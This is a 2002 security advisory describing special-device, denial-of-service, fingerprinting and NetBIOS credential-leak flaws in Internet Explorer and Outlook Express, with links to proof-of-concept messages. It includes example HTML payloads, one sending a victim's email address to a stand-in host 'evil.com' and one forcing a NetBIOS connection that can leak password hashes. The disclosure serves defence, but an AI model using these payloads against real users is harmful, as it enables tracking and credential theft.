Title: special device access and DoS in Microsoft Internet Exporer/Outlook Express/Outlook Authors: ERRor, 3APA3A Date: May, 14 2002 Affected: Internet Explorer 6.0 Vendor: Microsoft Risk: Average to high Remote: Yes Exploitable: Yes Vendor notified: April, 24 2002 Intro: All versions of Windows have a reserved filenames referred to special devices such as prn, aux, nul, etc also called DOS devices. Filename for special device may have any directory path and any extension after dot. For example c:\temp\prn.tmp refers to prn device. Same API is used to access special device and regular files. Unauthorized access to special device may be significant security issue causing different results: from Denial of Service against running program or service to hardware failure or secure data compromise. Problem: ERRor discovered that <BGSOUND> tag in conjunction with special device name causes DoS against Internet Explorer or Outlook Express regardless of security zone settings. For Outlook Express it's untrivial to remove malcrafted message without losing message folder. During investigation of this issue it was found by 3APA3A and ERRor that using <IFRAME> tag it's possible to send any data to special device. Another problem is that regardless of security zone settings source specified in <BGSOUND> tag is always downloaded. It makes it possible to fingerprint remote client by his e-mail using something like <bgsound src="http://evil.com/[email protected]"> Remote client fingerprint problem is discussed in . 4th problem (reported by Chad Loder
) is that by using tag like <bgsound src="\\126.96.36.199\new\file.wav"> it's possible to cause IE to establish external NetBIOS connection. Depending on LMCompatibilityLevel it may cause user's cleartext password or NTLMv1 challenge to leak. It's very serious bug. Exploitation: You can use  to test DoS against Outlook Express via <BGSOUN>.  will print text line on a text printer attached to lpt1 in Outlook Express 6.0 via <IFRAME> 1. Special device access and DoS in Outlook Express http://www.security.nnov.ru/search/news.asp?binid=2010 2. Outlook Express Special Device DoS POC http://www.security.nnov.ru/files/iedos/dos.eml 3. Outlook Express Special Device access POC http://www.security.nnov.ru/files/iedos/print.eml 4. Security risks assoticated with using e-mail. http://www.security.nnov.ru/articles/uninet/ Vendor: Microsoft was informed on April, 24, 2002. No feedback from vendor since April, 25.